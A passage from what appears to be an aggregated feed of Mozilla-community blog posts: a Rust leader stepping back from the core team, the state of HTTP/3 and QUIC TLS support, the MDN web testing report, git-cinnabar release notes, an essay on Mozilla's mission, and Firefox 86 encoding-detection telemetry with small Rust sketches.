In December, I decided to step back as lead of the compiler team. I had a number of reasons for doing so, but the most important is that I want to ensure that the Rust project continues to scale and grow. For that to happen, we need to transition from one individual doing all kinds of roles to people focusing on those places where they can have the most impact.7

Today I am announcing that I am stepping back from the Rust core team. I plan to focus all of my energies on my roles as lead of the language design team and tech lead of the AWS Rust Platform team.

Where we go from here

So now we come to my “shiny future”. My goal, as ever, is to continue to help Rust pursue its vision of being an accessible systems language. Accessible to me means that we offer strong safety guarantees coupled with a focus on ergonomics and usability; it also means that we build a welcoming, inclusive, and thoughtful community. To that end, I expect to be doing more product initiatives like the async vision doc to help Rust build a coherent vision for its future; I also expect to continue working on ways to scale the lang team, improve the RFC process, and help the teams function well.

I am so excited about all that we the Rust community have built. Rust has become a language that people not only use but that they love using. We’ve innovated not only in the design of the language but in the design and approach we’ve taken to our community. “In case you haven’t noticed…we’re doing the impossible here people!” So here’s to the next ten years!

  1. Offices! Remember those? Actually, I’ve been working remotely since 2013, so to be honest I barely do. 

  2. I think the first non-Mozilla member of the core team was Huon Wilson, but I can’t find any announcements about it. I did find this very nicely worded post by Brian Anderson about Huon’s departure though. “They live on in our hearts, and in our IRC channels.” Brilliant. 

  3. If you read RFC 1068, for example, you’ll see some language about the core team deciding what features to stabilize. I don’t think this happened even once: it was immediately clear that the teams were better positioned to make this decision. 

  4. The email makes this sound like a minor tweak to the process. Don’t be fooled. It’s true that people had always written “RFCs” to the mailing list. But they weren’t mandatory, and there was no real process around “accepting” or “rejecting” them. The RFC process was a pretty radical change, more radical I think than we ourselves even realized. The best part of it was that it was not optional for anyone, including core developers. 

  5. Better still, the RFC mechanism invites public feedback. This is important because no single team of people can really have expertise in the full range of considerations needed to design a language like Rust. 

  6. If you look back at my Rust roadmap posts, you’ll see that this has been a theme in every single one. 

  7. I kind of love these three slides from my Rust LATAM 2019 talk, which expressed the same basic idea, but from a different perspective. 

Daniel StenbergWhere is HTTP/3 right now?

tldr: the level of HTTP/3 support in servers is surprisingly high.

The specs

The specifications are all done. They’re now waiting in queues to get their final edits and approvals before they will get assigned RFC numbers and get published as such – they will not change any further. That’s a set of RFCs (six I believe) for various aspects of this new stack. The HTTP/3 spec is just one of those. Remember: HTTP/3 is the application protocol done over the new transport QUIC. (See http3 explained for a high-level description.)

The HTTP/3 spec was written to refer to, and thus depend on, two other HTTP specs that are in the works: httpbis-cache and httpbis-semantics. Those two are mostly clarifications and cleanups of older HTTP specs, but this forces the HTTP/3 spec to get published after the other two, which might introduce a small delay compared to the other QUIC documents.

The working group has started to take on work on new specifications for extensions and improvements beyond QUIC version 1.

HTTP/3 Usage

In early April 2021, the usage of QUIC and HTTP/3 in the world is measured by a few different companies.

QUIC support

netray.io scans the IPv4 address space weekly and checks how many hosts speak QUIC. Their latest scan found 2.1 million such hosts.

Arguably, the netray number doesn’t say much. Those two million hosts could be very well used or barely used machines.

HTTP/3 by w3techs

w3techs.com has been in the game of scanning web sites for stats purposes for a long time. They scan the top ten million sites and count what share runs/supports which technologies, and they also check for HTTP/3. In their data they call the old Google QUIC just “QUIC”, which is confusing, but that should be seen as the precursor to HTTP/3.

What stands out to me in this data, apart from the HTTP/3 usage seeming very high, is that the top one-million sites are claimed to have a higher share of HTTP/3 support (16.4%) than the top one-thousand (11.9%)! That’s the reverse of HTTP/2 and not how stats like this tend to look.

It has been suggested that the growth starting at Feb 2021 might be explained by Cloudflare’s enabling of HTTP/3 for users also in their free plan.

HTTP/3 by Cloudflare

On radar.cloudflare.com we can see Cloudflare’s view of a lot of Internet and protocol trends over the world.

(The last 30 days according to radar.cloudflare.com)

This HTTP/3 number is significantly lower than w3techs’. Presumably because of the differences in how they measure.


The browsers

All the major browsers have HTTP/3 implementations and most of them allow you to manually enable it if it isn’t already done so. Chrome and Edge have it enabled by default and Firefox will so very soon. The caniuse.com site shows it like this (updated on April 4):

(Earlier versions of this blog post showed the previous and inaccurate data from caniuse.com. Not anymore.)


curl has supported HTTP/3 for a while now, but you need to explicitly enable it at build time. It uses third-party libraries for the HTTP/3 layer and it needs a QUIC-capable TLS library. The QUIC/h3 libraries are still beta versions. See below for the TLS library situation.

curl’s HTTP/3 support is not even complete. There are still unsupported areas and it’s not considered stable yet.

Other clients

Facebook has previously talked about how they use HTTP/3 in their app, and presumably others do as well. There are of course also other implementations available.

TLS libraries

curl supports 14 different TLS libraries at this time. Two of them have QUIC support landed: BoringSSL and GnuTLS. And a third would be the quictls OpenSSL fork. (There are also a few other smaller TLS libraries that support QUIC.)


The by far most popular TLS library to use with curl, OpenSSL, has postponed their QUIC work:

“It is our expectation that once the 3.0 release is done, QUIC will become a significant focus of our effort.”

At the same time they have delayed the OpenSSL 3.0 release significantly. Their release schedule page still today speaks of a planned release of 3.0.0 in “early Q4 2020”. That plan expects a few months from the beta to final release and we have not yet seen a beta release, only alphas.

Realistically, this makes QUIC in OpenSSL many months off until it can appear even in a first alpha. Maybe even 2022 material?


The Google powered OpenSSL fork BoringSSL has supported QUIC for a long time and provides the OpenSSL API, but they don’t do releases and mostly focus on getting a library done for Google. People outside the company are generally reluctant to use and depend on this library for those reasons.

The quiche QUIC/h3 library from Cloudflare uses BoringSSL and curl can be built to use quiche (as well as BoringSSL).


Microsoft and Akamai have made a fork of OpenSSL available that is based on OpenSSL 1.1.1 and has the QUIC pull-request applied in order to offer a QUIC capable OpenSSL flavor to the world before the official OpenSSL gets their act together. This fork is called quictls. This should be compatible with OpenSSL in all other regards and provide QUIC with an API that is similar to BoringSSL’s.

The ngtcp2 QUIC library uses quictls. curl can be built to use ngtcp2 as well as quictls.

Is HTTP/3 faster?

I realize I can’t blog about this topic without at least touching this question. The main reason for adding support for HTTP/3 on your site is probably that it makes it faster for users, so does it?

According to cloudflare’s tests, it does, but the difference is not huge.

Other numbers showing h3 to be faster have been presented before, but it’s hard to find up-to-date performance measurements published for the current version of HTTP/3 vs HTTP/2 in real-world scenarios. Partly of course because people have hesitated to compare before there are proper implementations to compare with, rather than development versions not really made and tweaked to perform optimally.

I think there are reasons to expect h3 to be faster in several situations, but for people with high bandwidth low latency connections in the western world, maybe the difference won’t be noticeable?


I’ve previously shown the slide below to illustrate what needs to be done for curl to ship with HTTP/3 support enabled in distros and “widely” and I think the same works for a lot of other projects and clients who don’t control their TLS implementation and don’t write their own QUIC/h3 layer code.

This house of cards of h3 is slowly getting some stable components, but there are still too many moving parts for most of us to ship.

I assume that the rest of the browsers will also enable HTTP/3 by default soon, and the specs will be released not too long into the future. That will make HTTP/3 traffic on the web increase significantly.

The QUIC and h3 libraries will ship their first non-beta versions once the specs are out.

The TLS library situation will continue to hamper wider adoption among non-browsers and smaller players.

The big players already deploy HTTP/3.


I’ve updated this post after the initial publication, and the biggest corrections are in the Chrome/Edge details. Thanks to immediate feedback from Eric Lawrence. Remaining errors are still all mine! Thanks also to Barry Pollard who filed the PR to update the previously flawed caniuse.com data.

Hacks.Mozilla.OrgA web testing deep dive: The MDN web testing report

For the last couple of years, we’ve run the MDN Web Developer Needs Assessment (DNA) Report, which aims to highlight the key issues faced by developers building web sites and applications. This has proved to be an invaluable source of data for browser vendors and other organizations to prioritize improvements to the web platform. This year we did a deep dive into web testing, and we are delighted to be able to announce the publication of this follow-on work, available at our insights.developer.mozilla.org site along with our other Web DNA publications.

Why web testing?

In the Web DNA studies for 2019 and 2020, developers ranked the need “Having to support specific browsers, (e.g., IE11)” as the most frustrating aspect of web development, among 28 needs. The 2nd and 3rd rankings were also related to browser compatibility:

  1. Avoiding or removing a feature that doesn’t work across browsers
  2. Making a design look/work the same across browsers

In 2020, we released our browser compatibility research results — a deeper dive into identifying specific issues around browser compatibility and pinpointing what can be done to mitigate these issues.

This year we decided to follow up with another deep dive focused on the 4th most frustrating aspect of developing for the web, “Testing across browsers.” It follows on nicely from the previous deep dive, and also concerns much-sought-after information.

You can download this report directly — see the Web Testing Report (PDF, 0.6MB).

A new question for 2020

Based on the 2019 ranking of “testing across browsers”, we introduced a new question to the DNA survey in 2020: “What are the biggest pain points for you when it comes to web testing?” We wanted to understand more about this need and what some of the underlying issues are.

Respondents could choose one or more of the following answers:

  • Time spent on manual testing (e.g. due to lack of automation).
  • Slow-running tests.
  • Running tests across multiple browsers.
  • Test failures are hard to debug or reproduce.
  • Lack of debug tooling support (browser dev tools or IDE integration).
  • Difficulty diagnosing performance issues.
  • Tests are difficult to write.
  • Difficult to set up an adequate test environment.
  • No pain points.
  • Other.

Results summary

7.5% of respondents (out of 6,645) said they don’t have pain points with web testing. For those who did, the biggest pain point is the time spent on manual testing.

To better understand the nuances behind these results, we ran a qualitative study on web testing. The study consisted of twenty one-hour interviews with web developers who took the 2020 DNA survey and agreed to participate in follow-up research.

The results will help browser vendors understand whether to accelerate work on WebDriver Bidirectional Protocol (BiDi) or if the unmet needs lie elsewhere. Our analysis on WebDriver BiDi is based on the assumption that the feature gap between single-browser test tooling and cross-browser test tooling is a source of pain. Future research on the struggles developers have will be able to focus the priorities and technical design of that specification to address the pain points.

Key Takeaways

  • In the 2020 Web DNA report, we included the results of a segmentation study. One of the seven segments that emerged was “Testing Technicians”. The name implies that the segment does testing and therefore finds frustration while doing tests. This is correct, but what’s also true is that developers commonly see a high entry barrier to testing, which contributes to their frustration.
  • Defining a testing workflow, choosing tools, writing tests, and running tests all take time. Many developers face pressure to develop and launch products under tight deadlines. Testing or not testing is a tradeoff between the perceived value that testing adds compared to the time it will take to implement.
  • Some developers are aware of testing but limited by their lack of knowledge in the area. This lack of knowledge is a barrier to successfully implementing a testing strategy. Other developers are aware of what testing is and how to do it, but they still consider it frustrating. Rather than lacking knowledge, this second group lacks the time and resources to run tests to the degree that they’d ideally like.
  • For some developers, what constitutes a test type is unclear. Additionally, the line between coding and testing can be blurry.
  • For developers who have established a testing workflow, the best way to describe how that came to be is evolutionary. The evolutionary workflow is generally being continuously improved.
  • Browser vendors assumed unit testing to be a common type of testing and that it’s a well-developed space without a lot of pain points. However, what we learned is that there are more challenges with unit testing code that runs in the browser than anticipated, and there’s the same time pressure as elsewhere, meaning it doesn’t happen as frequently as expected.
  • In the most general of summaries, one could conclude that testing should take less time than it does.
  • Stakeholders had assumed that developers want to test their code in as many browsers as they can and they’re just limited by the browsers their tools support. What we learned is that the decision of which browsers they support does not depend on the tools they use. Conversely, what browsers they support drives the decisions for which tools they use.

The post A web testing deep dive: The MDN web testing report appeared first on Mozilla Hacks - the Web developer blog.

Mike HommeyAnnouncing git-cinnabar 0.5.7

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows you to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.6?

  • Updated git to 2.31.1 for the helper.
  • When using git >= 2.31.0, git -c config=value ... works again.
  • Minor fixes.

Robert KaiserIs Mozilla Still Needed Nowadays?

tl;dr: Happy 23rd birthday, Mozilla. And for the question: yes.

Here's a bit more rambling on this topic...

First of all, the Mozilla project was officially started on March 31, 1998, which is 23 years ago today. Happy birthday to my favorite "dino" out there! For more background, take a look at my Mozilla History talk from this year's FOSDEM, and/or watch the "Code Rush" documentary that conserved that moment in time so well and also gives nice insight into late-90's Silicon Valley culture.

Now, Mozilla initially was there to "act as the virtual meeting place for the Mozilla code" while Netscape was still around with the goal of winning back the browser market that was slipping over to Microsoft. The revolutionary stance of developing a large consumer application in the open, along with the marketing of "hack - this technology could fall into the right hands", the general novelty of the open-source movement back then - and last but not least a very friendly community (as I could find out myself) - made this young project quickly grow to be more than a development vehicle for AOL/Netscape, though. And in 2003, a mission to "preserve choice and innovation on the Internet" was set up for the project, shortly after backed by a non-profit Mozilla Foundation, and then with an independently developed Firefox browser, implementing "the idea [...] to design the best web browser for most people" - and starting to take back the web from the stagnation and lack of choice represented by >95% of the landscape being dominated by Microsoft Internet Explorer.

The exact phrasing of Mozilla's mission has been massaged a few times, but from the view of the core contributors, it has always meant the same thing. It currently reads:
Our mission is to ensure the Internet is a global public resource, open and accessible to all. An Internet that truly puts people first, where individuals can shape their own experience and are empowered, safe and independent.
On the Foundation site, there's the sentence "It is Mozilla’s duty to ensure the internet remains a force for good." - also pretty much meaning the same thing with that, just in less specific terms. Of course, the spirit of the project was also put into 10 pretty concrete technical principles, prefaced by 4 social pledges, in the Mozilla Manifesto, which make it even more clear and concrete what the project sees as its core purpose.

So, if we think about the question whether we still need Mozilla nowadays, we should take a look if moving in that direction is still required and helpful, and if Mozilla is still able and willing to push those principles forward.

When quite a few communities I'm part of - or would like to be part of - are moving to Discord or are adding it as an additional option to Facebook groups, and I read the Terms of Service of those two tightly closed and privacy-unfriendly services, I have to conclude that the current Internet is not open, is not putting people first, and I feel neither empowered, safe, nor independent in that space. When YouTube selects recommendations so that I live in a weird bubble that pulls me into conspiracies and negativity pretty fast, I don't feel like individuals can shape their own experience. When watching videos stored on certain sites is cheaper or less throttled than other sources with any new data plan I can get for my phone, or when geoblocking hinders me from watching even a trailer of my favorite series, I don't feel like the Internet is equally accessible to all. Neither do I when political misinformation is targeted at certain groups of users in election ads on social networks without any transparency to the public. But I would long for all that to be different, and to follow the principles I talked of above. So, I'd say those are still required, and it would be helpful to push for them.

It all feels like we need someone to unfck the Internet right now more than ever. We need someone to collect info on what's wrong and how it could get better there. We need someone to educate users, companies and politicians alike on where the dangers are and how we can improve the digital space. We need someone who gives us a fast, private and secure alternative to Google's browser and rendering engine that dominates the Internet now, someone to lead us out of the monoculture that threatens to bring innovation to a grind. Someone who has protecting privacy of people as one of their primary principles, and continues work on additional ways of keeping people safe. And that's just the start. As the links on all those points show, Mozilla tries hard to do all that, and more.

I definitely think we badly need a Mozilla that works on all those issues, and we need a whole lot of other projects and people help in the space as well. Be it in advocacy, in communication, in technology (links are just examples), or in other topics.

Can all that actually succeed in improving the Internet? Well, it definitely needs all of us to help, starting with using products like Firefox, supporting organizations like Mozilla, spreading the word, maybe helping to build a community, or even to contribute where we can.

We definitely need Mozilla today, even 23 years after its inception. Maybe we need it more than ever, actually. Are you in?

CC-BY-SA The text of this post is licensed under Creative Commons BY-SA 4.0.

Henri SivonenA Look at Encoding Detection and Encoding Menu Telemetry from Firefox 86

Firefox gained a way to trigger chardetng from the Text Encoding menu in Firefox 86. In this post, I examine both telemetry from Firefox 86 related to the Text Encoding menu and telemetry related to chardetng running automatically (without the menu).

The questions I’d like to answer are:

  • Can we replace the Text Encoding menu with a single menu item that performs the function currently performed by the item Automatic in the Text Encoding menu? 

  • Does chardetng have to revise its guess often? (That is, is the guess made at one kilobyte typically the same as the guess made at the end of the stream? If not, there’s a reload.) 

  • Does the top-level domain affect the guess often? (If yes, maybe it’s worthwhile to tune this area.) 

  • Is unlabeled UTF-8 so common as to warrant further action to support it? 

  • Is the unlabeled UTF-8 situation different enough for text/html and text/plain to warrant different treatment of text/plain? 

The failure mode of decoding according to the wrong encoding is very different for the Latin script and for non-Latin scripts. Also, there are historical differences in UTF-8 adoption and encoding labeling in different language contexts. For example, UTF-8 adoption happened sooner for the Arabic script and for Vietnamese while Web developers in Poland and Japan had different attitudes towards encoding labeling early on. For this reason, it’s not enough to look at the global aggregation of data alone.

Since Firefox’s encoding behavior no longer depends on the UI locale and a substantial number of users use the en-US localization in non-U.S. contexts, I use geographic location rather than the UI locale as a proxy for the legacy encoding family of the Web content primarily being read.

The geographical breakdown of telemetry is presented in the tables by ISO 3166-1 alpha-2 code. The code is deduced from the source IP addresses of the telemetry submissions at the time of ingestion, after which the IP address itself is discarded. As another privacy-relevant point, the measurements below referring to the .jp, .in, and .lk TLDs are not an indication of URL collection. The split into four coarse categories, .jp, .in+.lk, other ccTLD, and non-ccTLD, was done on the client side as a side effect of these four TLD categories getting technically different detection treatment: .jp has a dedicated detector, .in and .lk don’t run detection at all, for other ccTLDs the TLD is one signal taken into account, and for other TLDs the detection is based on the content only. (It’s imaginable that there could be regional differences in how willing users are to participate in telemetry collection, but I don’t know if there actually are regional differences.)
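As a sketch, the client-side four-way split described above could be expressed like this (the type and function names are hypothetical illustrations for this post, not Firefox's actual code):

```rust
/// The four detection-treatment categories described above.
/// Names are illustrative, not actual Firefox telemetry keys.
#[derive(Debug, PartialEq)]
enum TldCategory {
    DedicatedJpDetector, // .jp: dedicated Japanese detector runs
    NoDetection,         // .in and .lk: no detection at all
    CcTldSignal,         // other ccTLDs: the TLD is one input signal
    ContentOnly,         // generic TLDs: content-based detection only
}

fn categorize_tld(tld: &str) -> TldCategory {
    match tld {
        "jp" => TldCategory::DedicatedJpDetector,
        "in" | "lk" => TldCategory::NoDetection,
        // Two-letter TLDs are country-code TLDs.
        t if t.len() == 2 => TldCategory::CcTldSignal,
        _ => TldCategory::ContentOnly,
    }
}

fn main() {
    assert_eq!(categorize_tld("jp"), TldCategory::DedicatedJpDetector);
    assert_eq!(categorize_tld("in"), TldCategory::NoDetection);
    assert_eq!(categorize_tld("hu"), TldCategory::CcTldSignal);
    assert_eq!(categorize_tld("com"), TldCategory::ContentOnly);
    println!("ok");
}
```

Because the split is computed on the client, only these four coarse categories, never the TLDs themselves beyond that, end up in the telemetry.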

Menu Usage

Starting with 86, Firefox has a probe that measures if the item “Automatic” in the Text Encoding menu has been used at least once in a given subsession. It also has another probe measuring whether any of the other (manual) items in the Text Encoding menu has been used at least once in a given subsession.

Both the manual selection and the automatic selection are used at the highest rate in Japan. The places with the next-highest usage rates are Hong Kong and Taiwan. The manual selection is still used in more sessions than the automatic selection. In Japan and Hong Kong, the factor is less than 2. In Taiwan, it’s less than 3. In places where the dominant script is the Cyrillic script, manual selection is relatively even more popular. This is understandable, considering that the automatic option is a new piece of UI that users probably haven’t gotten used to, yet.

All in all, the menu is used rarely relative to the total number of subsessions, but I assume the usage rate in Japan still makes the menu worth keeping, considering how speedy feedback from Japan is whenever I break something in this area. Even though menu usage seems very rare, with a large number of users a notable number of people still find the need to use the menu daily.

Japan is a special case, though, since we have a dedicated detector that runs on the .jp TLD. The menu usage rates in Hong Kong and Taiwan are pretty close to the rate in Japan, though.

In retrospect, it’s unfortunate that the new probes for menu usage frequency can’t be directly compared with the old probe, because we now have distinct probes for the automatic option being used at least once per subsession and a manual option being used at least once per subsession, and both a manual option and the automatic option could be used in the same Firefox subsession. We can calculate changes assuming the extreme cases: the case where the automatic option is always used in a subsession together with a manual option and the case where they are always used in distinct subsessions. This gives us worst case and best case percentages of the Firefox 86 menu use rate compared to the Firefox 71 menu use rate. (E.g. 89% means that the menu was used 11% less in 86 than in 71.) The table is sorted by the relative frequency of use of the automatic option in Firefox 86. The table is not exhaustive. It is filtered both to objectively exclude rows by a low number of distinct telemetry submitters and semi-subjectively to exclude encoding-wise similar places or places whose results seemed noisy. Also, Germany, India, and Italy are taken as counter-examples of places that are notably apart from the others in terms of menu usage frequency, and India being encoding-wise treated specially.
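For concreteness, here is a minimal sketch of how such worst/best-case bounds can be computed from the two new probes (the rates used below are made-up placeholders, not real telemetry values):

```rust
/// Bounds on the fraction of subsessions with any menu use, given the
/// per-subsession rates of the "automatic" probe and the "manual" probe.
/// Full overlap of the two probes gives the lower bound; no overlap
/// gives the upper bound.
fn any_menu_use_bounds(auto_rate: f64, manual_rate: f64) -> (f64, f64) {
    let lower = auto_rate.max(manual_rate);
    let upper = (auto_rate + manual_rate).min(1.0);
    (lower, upper)
}

fn main() {
    // Hypothetical example rates, not real telemetry numbers.
    let (lower, upper) = any_menu_use_bounds(0.002, 0.003);
    let old_rate = 0.004; // hypothetical Firefox 71 combined-probe rate
    // Best and worst case of Firefox 86 use relative to Firefox 71:
    let best_case = lower / old_rate; // full-overlap assumption
    let worst_case = upper / old_rate; // no-overlap assumption
    assert!((best_case - 0.75).abs() < 1e-9);
    assert!((worst_case - 1.25).abs() < 1e-9);
    println!("best {:.0}%, worst {:.0}%", best_case * 100.0, worst_case * 100.0);
}
```

In this made-up example, the menu was used somewhere between 25% less and 25% more in 86 than in 71; the real tables bracket the true change the same way.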

Worst case | Best case

The result is a bit concerning. According to the best case numbers, things got better everywhere except in Ukraine. The worst case numbers suggest that things might have gotten worse in other places where the Cyrillic script is the dominant script as well, and also in Turkey and Hungary, where the dominant legacy encoding is known to be tricky to distinguish from windows-1252, and in India, whose domestic ccTLD is excluded from autodetection. Still, the numbers for Russia, Hungary, Turkey, and India look like things might have stayed the same or gotten a bit better.

At least in the case of the Turkish and Hungarian languages, the misdetection of the encoding is going to be another Latin-script encoding anyway, so the result is not catastrophic in terms of user experience. You can still figure out what the text is meant to say. For any non-Latin script, including the Cyrillic script, misdetection makes the page completely unreadable. In that sense, the numbers for Ukraine are concerning.

In the case of India, the domestic ccTLD, .in, is excluded from autodetection and simply falls back to windows-1252 like it used to. Therefore, for users in India, the added autodetection applies only on other TLDs, including to content published from within India on generic TLDs. We can’t really conclude anything in particular about changes to the browser user experience in India itself. However, we can observe that, with the exception of Ukraine (the other case where the worst case was over 100%), the worst case was within the same ballpark as the worst case for India, where the worst case may not be meaningful, so maybe the other similar worst-case results don’t really indicate things getting substantially worse.

To understand how much menu usage in Ukraine has previously changed from version to version, I looked at the old numbers from Firefox 69, 70, 71, 74, 75, and 76. chardetng landed in Firefox 73 and settled down by Firefox 78. The old telemetry probe expired, which is why we don’t have data from Firefox 85 to compare with.


In the table, the percentage in the cell is the usage rate in the version from the column relative to the version from the row. E.g. in version 70, the usage was 87% of the usage in version 69 and, therefore, decreased by 13%.

This does make even the best-case change from 71 to 86 for Ukraine look like a possible signal and not noise. However, the change from 71 to 74, 75, and 76, representing the original landing of chardetng, was substantially milder. Furthermore, the difference between 69 and 71 was larger, which suggests that the fluctuation between versions may be rather large.

It’s worth noting that with the legacy encoded data synthesized from the Ukrainian Wikipedia, chardetng is 100% accurate with document-length inputs and 98% accurate with title-length inputs. This suggests that the problem might be something that cannot be remedied by tweaking chardetng. Boosting Ukrainian detection without a non-Wikipedia corpus to evaluate with would risk breaking Greek detection (the other non-Latin bicameral script) without any clear metric of how much to boost Ukrainian detection.

Menu Usage Situation

Let’s look at what the situation where the menu (either the automatic option or a manual option) was used was like. This is recorded relative to the top-level page, so this may be misleading if the content that motivated the user to use the menu was actually in a frame.

First, let’s describe the situations. Note that Firefox 86 did not honor bogo-XML declarations in text/html, so documents whose only label was in a bogo-XML declaration count as unlabeled.

  • The encoding was already manually overridden. That is, the user was unhappy with their previous manual choice. This gives an idea of how users need to iterate with manual choices.
  • The encoding was already overridden with the automatic option. This suggests that either chardetng guessed wrong or the problem that the user is seeing cannot be remedied by the encoding menu. (E.g. UTF-8 content misdecoded as windows-1252 and then re-encoded as UTF-8 cannot be remedied by any choice from the menu.)
  • Unlabeled non-UTF-8 content containing non-ASCII was loaded from a ccTLD other than .jp, .in, or .lk, and the TLD influenced chardetng’s decision. That is, the same bytes served from a .com domain would have been detected differently.
  • Unlabeled non-UTF-8 content containing non-ASCII was loaded from a TLD other than .jp, .in, or .lk, and the TLD did not influence chardetng’s decision. (The TLD may have been either a ccTLD that didn’t end up contributing to the decision or a generic TLD.)
  • Unlabeled non-UTF-8 content from a file: URL.
  • Unlabeled (remote; i.e. non-file:) content that was fully ASCII, excluding the .jp, .in, and .lk TLDs. This indicates that either the problem the user attempted to remedy was in a frame or was a problem that the menu cannot remedy.
  • Unlabeled content (ASCII, UTF-8, or ASCII-compatible legacy) from either the .in or .lk TLDs.
  • Unlabeled content (ASCII, UTF-8, or ASCII-compatible legacy) from the .jp TLD. The .jp-specific detector, which detects among the three Japanese legacy encodings, ran.
  • Unlabeled content (outside the .jp, .in, and .lk TLDs) that was actually UTF-8 but was not automatically decoded as UTF-8 to avoid making the Web Platform more brittle. We know that there is an encoding problem for sure and we know that choosing either “Automatic” or “Unicode” from the menu resolves it.
  • An ASCII-compatible legacy encoding or ISO-2022-JP was declared on the HTTP layer.
  • UTF-8 was declared on the HTTP layer but the content wasn’t valid UTF-8. (The menu is disabled if the top-level page is declared as UTF-8 and is valid UTF-8.)
  • An ASCII-compatible legacy encoding or ISO-2022-JP was declared in meta (in the non-file: case).
  • UTF-8 was declared in meta (in the non-file: case) but the content wasn’t valid UTF-8. (The menu is disabled if the top-level page is declared as UTF-8 and is valid UTF-8.)
  • An encoding was declared in meta in a document loaded from a file: URL and the actual content wasn’t valid UTF-8. (The menu is disabled if the top-level page is declared as UTF-8 and is valid UTF-8.)
  • A none-of-the-above situation that was not supposed to happen and, therefore, is a bug in how I set up the telemetry collection.

The cases AutoOverridden, UnlabeledNonUtf8TLD, UnlabeledNonUtf8, and LocalUnlabeled represent cases that are suggestive of chardetng having been wrong (or the user misdiagnosing the situation). These cases together are in the minority relative to the other cases. Notably, their total share is very near the share of UnlabeledAscii, which is probably more indicative of how often users misdiagnose what they see as remedyable via the Text Encoding menu than indicative of sites using frames. However, I have no proof either way of whether this represents misdiagnosis by the user more often or frames more often. In any case, having potential detector errors be in the same ballpark as cases where the top-level page is actually all-ASCII is a sign of the detector probably being pretty good.

The UnlabeledAscii number for Israel stands out. I have no idea why. Are frames more common there? Is it a common pattern to programmatically convert content to numeric character references? If the input to such conversion has been previously misdecoded, the result looks like an encoding error to the user but cannot be remedied from the menu.

Globally, the dominant case is UnlabeledUtf8. This is sad in the sense that we could automatically fix this case for users if there wasn’t a feedback loop to Web author behavior. See a separate write-up on this topic. Also, this metric stands out for mainland China. We’ll also come back to other metrics related to unlabeled UTF-8 standing out in the case of mainland China.

Mislabeled content is a very substantial reason for overriding the encoding. For ChannelNonUtf8, MetaNonUtf8, and LocalLabeled, the label was either actually wrong or the user misdiagnosed the situation. For UnlabeledUtf8 and MetaUtf8, we can be very confident that there was an actual authoring-side error. Unsurprisingly, overriding an encoding labeled on the HTTP layer is much more common than overriding an encoding labeled within the file. This supports the notion that Ruby’s Postulate is correct.

Note that the number for UnlabeledJp in Japan does not indicate that the dedicated Japanese detector is broken. The number could represent unlabeled UTF-8 on the .jp TLD, since the .jp TLD is excluded from the other columns.

The relatively high numbers for ManuallyOverridden indicate that users are rather bad at figuring out on the first attempt what they should choose from the menu. When chardetng would guess right, not giving users the manual option would be a usability improvement. However, in cases where nothing in the menu solves the problem, there’s a cohort of users who are unhappy about software deciding for them that there is no solution and are happier by manually coming to the conclusion that there is no solution. For them, an objective usability improvement could feel patronizing. Obviously, when chardetng would guess wrong, not providing manual recourse would make things substantially worse.

It’s unclear what one should conclude from the AutoOverridden and LocalUnlabeled numbers. They can represent cases where chardetng actually guessed wrong, or cases where the manual items don’t provide a remedy either. E.g. none of the menu items remedies UTF-8 having been decoded as windows-1252 and the result having been encoded as UTF-8. The higher numbers for Hong Kong and Taiwan look like a signal of a problem. Because mainland China and Singapore don’t show a similar issue, it’s more likely that the signal for Hong Kong and Taiwan is about Big5 rather than GBK. I find this strange, because Big5 should be structurally distinctive enough for the guess to be right if there is an entire document of data to make the decision from. One possibility is that Big5 extensions, such as Big5-UAO, whose character allocations the Encoding Standard treats as unmapped, are more common in legacy content than previously thought. Even one such extension character causes chardetng to reject the document as not Big5. I have previously identified this as a potential risk. Also, it is strange that LocalUnlabeled is notably higher than the global figure for Singapore, Greece, and Israel as well, but these don’t show a similar difference on the AutoOverridden side.

The Bug category is concerningly high. What have I missed when writing the collection code? Also, how is it so much higher in Bulgaria?

Non-Menu Detector Outcomes

Next, let’s look at non-menu detection scenarios: What’s the relative frequency of non-file: non-menu non-ASCII chardetng outcomes? (Note that this excludes the .jp, .in, and .lk TLDs. .jp runs a dedicated detector instead of chardetng and no detector runs on .in and .lk.)

Here are the outcomes (note that ASCII-only outcomes are excluded):

  • The detector knew that the content was UTF-8 and the decision was made from the first kilobyte. (However, a known-wrong TLD-affiliated legacy encoding was used instead in order to avoid making the Web Platform more brittle.)
  • The detector knew that the content was UTF-8, but the first kilobyte was not enough to decide. That is, the first kilobyte was ASCII. (However, a known-wrong TLD-affiliated legacy encoding was used instead in order to avoid making the Web Platform more brittle.)
  • The content was non-UTF-8 and the decision was affected by the ccTLD. That is, the same bytes on .com would have been decided differently. The decision that was made once the first kilobyte was seen remained the same when the whole content was seen.
  • The content was non-UTF-8 and the decision was affected by the ccTLD. That is, the same bytes on .com would have been decided differently. The guess made once the first kilobyte had been seen differed from the eventual decision made when the whole content had been seen.
  • The content was non-UTF-8 on a ccTLD, but the decision was not affected by the TLD. That is, the same content on .com would have been decided the same way. The decision that was made once the first kilobyte was seen remained the same when the whole content was seen.
  • The content was non-UTF-8 on a ccTLD, but the decision was not affected by the TLD. That is, the same content on .com would have been decided the same way. The guess made once the first kilobyte had been seen differed from the eventual decision made when the whole content had been seen.
  • The content was non-UTF-8 on a generic TLD. The decision that was made once the first kilobyte was seen remained the same when the whole content was seen.
  • The content was non-UTF-8 on a generic TLD. The guess made once the first kilobyte had been seen differed from the eventual decision made when the whole content had been seen.

The rows are grouped by the most detection-relevant legacy encoding family (e.g. Singapore is grouped according to Simplified Chinese) sorted by Windows code page number and the rows within a group are sorted by the ISO 3166 code. The places selected for display are either exhaustive exemplars of a given legacy encoding family or, when not exhaustive, either large-population exemplars or detection-wise remarkable cases. (E.g. Icelandic is detection-wise remarkable, which is why Iceland is shown.)


Legacy family | Place | UTF-8 (initial) | UTF-8 (final) | TLD-affected (initial) | TLD-affected (final) | TLD-unaffected (initial) | TLD-unaffected (final) | Generic (initial) | Generic (final)
Simplified Chinese | CN | 13.7% | 17.3% | 0.2% | 0.0% | 7.0% | 0.1% | 61.1% | 0.6%
Traditional Chinese | HK | 13.5% | 56.3% | 0.5% | 0.0% | 3.6% | 0.1% | 24.4% | 1.6%
Central European | CZ | 12.6% | 49.6% | 0.7% | 0.0% | 33.6% | 0.1% | 2.5% | 0.9%


Legacy family | Place | UTF-8 (initial) | UTF-8 (final) | TLD-affected (initial) | TLD-affected (final) | TLD-unaffected (initial) | TLD-unaffected (final) | Generic (initial) | Generic (final)
